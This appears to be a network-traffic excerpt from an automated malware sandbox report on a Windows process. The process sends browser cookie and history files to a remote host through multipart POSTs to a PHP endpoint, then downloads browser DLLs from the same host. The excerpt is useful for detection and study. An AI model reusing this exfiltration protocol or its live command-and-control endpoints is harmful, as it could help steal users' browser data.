Dec 14, 2024 12:56:41.921175003 CET	1236	IN	Data Raw: 50 ff 51 0c 39 75 fc 74 3f ff 75 fc e8 d4 fd ff ff 59 8d 4d d8 51 6a 18 50 89 45 fc ff 15 40 a0 41 00 6a 06 ff 75 e0 ff 75 dc 56 56 56 ff 75 08 ff 15 84 a2 41 00 ff 75 fc 56 68 72 01 00 00 ff 75 08 ff 15 b8 a2 41 00 8b 45 f0 8b 08 50 ff 51 08 33 Data Ascii: PQ9ut?uYMQjPE@AjuuVVVuAuVhruAEPQ3@WPA3_^[f=AuD<AfAAfft@Af=uDAA;ufAAUSV339AtAM9tFA9u9
Dec 14, 2024 12:56:41.921207905 CET	1236	IN	Data Raw: 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50 ff 15 3c a2 41 00 83 c4 0c c2 08 00 53 56 57 eb 3b 8b 02 8b 39 8a 1c 07 8a c3 e8 db f5 ff ff 84 c0 75 27 80 fb 3b 75 2d 3b fe 7d 12 8b 01 8b 32 80 3c Data Ascii: [QL$+THRQL$HP<ASVW;9u';u-;}2<0t@;B\|2_^[Ar91\|S\$VWu33\|$Gt$P$AtF;w\|3_^[t3GVt$W39~~(Ft$P$AujWPOG;~
Dec 14, 2024 12:56:41.921226025 CET	448	IN	Data Raw: 37 00 89 75 f4 e8 ec fd ff ff 57 e8 ef 64 01 00 59 5f 8b 45 08 5e 5b c9 c2 0c 00 53 56 8b 74 24 0c 57 8b f9 8b 47 04 39 06 7e 02 89 06 8b 5c 24 14 53 e8 d0 e6 ff ff 8b 06 50 03 c3 50 8b cf e8 ec fa ff ff 5f 5e 5b c2 08 00 8b 44 24 08 ff 30 8b 44 Data Ascii: 7uWdY_E^[SVt$WG9~\$SPP_^[D$0D$0YY@W\|$D$xt.SVpFPVPVSjt$,8Af$A^G[_USVuE39Xt2WxS?ESAPQNPWuSuA
Dec 14, 2024 12:56:41.921242952 CET	1236	IN	Data Raw: 89 5d f0 eb 03 8b 7d 08 8b 07 8d 4d e4 51 b9 00 10 00 00 2b ce 51 8d 8c 35 e0 ef ff ff 51 57 ff 50 0c 85 c0 0f 85 ca 00 00 00 8b 45 e4 3b c3 0f 84 bf 00 00 00 03 f0 8d 85 e0 ef ff ff 33 ff 89 45 f8 38 5d ff 8b c6 74 3d 2b 45 e8 3b f8 77 60 ff 75 Data Ascii: ]}MQ+Q5QWPE;3E8]t=+E;w`uuubE:EtuMvGE+E;w#uuubuEEE+}V=]PP<A9]w}"M39Y
Dec 14, 2024 12:56:42.041203976 CET	1236	IN	Data Raw: 01 50 50 8b cf e8 97 f6 ff ff 50 ff 74 24 18 ff 15 c4 a2 41 00 8b 07 66 83 24 70 00 89 77 04 8b c7 5f 5e c3 55 8b ec 83 ec 74 53 56 8b 75 08 57 6a 40 8d 45 8c 50 56 ff 15 9c a2 41 00 85 c0 74 49 68 f8 a5 41 00 8d 45 8c 50 ff 15 48 a1 41 00 85 c0 Data Ascii: PPPt$Af$pw_^UtSVuWj@EPVAtIhAEPHAu6jV\|Au)EVPvjhAutu]Y3_^[VA3;EthAhAEPVYYVAhAE+ESSWuPE+EPuuhPhAh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49886	185.215.113.206	80	6828	C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:45.998054981 CET	621	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKFHIIEHIEGDHJJJKFII Host: 185.215.113.206 Content-Length: 419 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 [TRUNCATED] Data Ascii: ------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------JKFHIIEHIEGDHJJJKFII--
Dec 14, 2024 12:56:47.844516993 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 12:56:48.024564028 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBFIIIEHCFHJKFHDHDA Host: 185.215.113.206 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 12:56:48.024586916 CET	1451	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 Data Ascii: ------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
Dec 14, 2024 12:56:48.341334105 CET	1236	OUT	Data Raw: 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 Data Ascii: "file_name"aGlzdG9yeVxHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="file"aHR0cHM6Ly9nby5taWNyb3NvZnQuY29tL2Z3bGluay8/TGlua0lkPTIxMDYyNDMKaHR0cHM6Ly9nby5taWNyb3NvZnQuY29tL2Z3bGluay8
Dec 14, 2024 12:56:48.971216917 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 12:56:49.031950951 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKF Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file"------FCAAEHJDBKJJKFHJEBKF--
Dec 14, 2024 12:56:49.970524073 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 12:56:51.076841116 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIJJKKFHIEHJKECGCGC Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="file"------FIIJJKKFHIEHJKECGCGC--
Dec 14, 2024 12:56:52.012105942 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 12:56:54.051047087 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 14, 2024 12:56:54.514066935 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:54 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Dec 14, 2024 12:56:54.514107943 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Dec 14, 2024 12:56:54.514142990 CET	1236	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$
Dec 14, 2024 12:56:54.514178038 CET	672	IN	Data Raw: 55 89 e5 53 57 56 83 ec 24 8b 4d 1c 8b 75 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 7d 08 8d 59 f8 83 f9 10 75 32 8d 45 dc 8d 4d e0 6a 10 ff 75 18 6a 10 50 51 57 e8 f7 93 06 00 83 c4 18 89 c7 8d 75 e8 83 45 dc f8 c7 45 d8 00 00 00 00 85 ff 0f 85 b4 01 Data Ascii: USWV$Mu01E}Yu2EMjujPQWuEEC1;]vS{EE1uuSPVEPo9]SUYY)ZYEME]M)19D
Dec 14, 2024 12:56:54.514213085 CET	1236	IN	Data Raw: c7 47 08 00 00 00 00 89 47 04 8b 48 04 ff 15 00 80 0a 10 ff d1 89 07 be ff ff ff ff 85 c0 74 49 8b 55 10 89 f9 ff 75 18 ff 75 14 e8 40 00 00 00 83 c4 08 85 c0 74 30 8b 1f 85 db 74 2c 8b 47 04 8b 48 0c ff 15 00 80 0a 10 6a 01 53 ff d1 83 c4 08 eb Data Ascii: GGHtIUuu@t0t,GHjShv1^_[]USWVLU01E}Yt9vhC9Us[KSFHuWSFHE}j@PWS
Dec 14, 2024 12:56:54.514247894 CET	1236	IN	Data Raw: 57 56 8b 75 0c 8b 7d 10 8b 45 08 8b 18 8b 40 04 8b 48 14 ff 15 00 80 0a 10 57 56 53 ff d1 83 c4 0c 5e 5f 5b 5d c3 cc cc cc cc cc cc 55 89 e5 53 57 56 50 8b 4d 14 8b 7d 08 8b 47 04 39 08 76 17 68 05 e0 ff ff e8 b5 fa 07 00 83 c4 04 b8 ff ff ff ff Data Ascii: WVu}E@HWVS^_[]USWVPM}G9vhuHuVuSO;upISEGHpVSu7GHES]SV7GHuuSV1
Dec 14, 2024 12:56:54.522777081 CET	1236	IN	Data Raw: 56 ff 75 18 50 ff 75 10 e8 0b 00 00 00 83 c4 10 5e 5d c3 cc cc cc cc cc 55 89 e5 53 57 56 83 ec 34 89 4d f0 8b 45 14 89 45 d8 39 45 0c 73 17 68 03 e0 ff ff e8 f2 f5 07 00 83 c4 04 b8 ff ff ff ff e9 79 08 00 00 89 55 e4 8b 7d 10 8b 5d 08 8b 45 f0 Data Ascii: VuPu^]USWV4MEE9EshyU}]E}}aM}$7$7u2M$E}$7$7u]S2MQE}
Dec 14, 2024 12:56:54.522813082 CET	1236	IN	Data Raw: e8 66 0f 70 d2 e8 66 0f 62 ca 66 0f 6e 54 07 04 66 0f 60 d3 66 0f 61 d3 66 0f eb cf 66 0f 72 f4 17 66 0f fe e5 f3 0f 5b e4 66 0f 70 ea f5 66 0f f4 d4 66 0f 70 e4 f5 66 0f f4 e5 66 0f 70 d2 e8 66 0f 70 e4 e8 66 0f 62 d4 66 0f eb d6 83 c6 10 66 0f Data Ascii: fpfbfnTf`faffrf[fpffpffpfpfbff!~sMEMEUxEUMfEMUTFtFMUEM)ffo 1ffo f
Dec 14, 2024 12:56:54.531119108 CET	1236	IN	Data Raw: 55 f0 0f b6 04 02 c1 e0 10 09 c8 8b 4d e8 8b 55 ec 01 d1 83 c1 04 0f b6 c9 8b 55 f0 0f b6 14 0a 00 d3 0f b6 f3 8b 7d f0 8a 34 37 8b 7d f0 88 34 0f 8b 4d f0 88 14 31 8b 75 d8 00 d6 0f b6 ce 8b 55 f0 0f b6 14 0a c1 e2 18 09 c2 33 55 e0 8b 4d c4 8b Data Ascii: UMUU}47}4M1uU3UMEM}}Eu;uUM}Et}EPEE},7,7E@2
Dec 14, 2024 12:56:56.152564049 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 14, 2024 12:56:56.595448971 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:56 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Dec 14, 2024 12:56:57.688656092 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 14, 2024 12:56:58.131577969 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:57 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 14, 2024 12:56:58.971019030 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 14, 2024 12:56:59.414136887 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:56:59 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Dec 14, 2024 12:57:02.527544975 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 14, 2024 12:57:02.970205069 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:57:02 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Dec 14, 2024 12:57:04.195110083 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
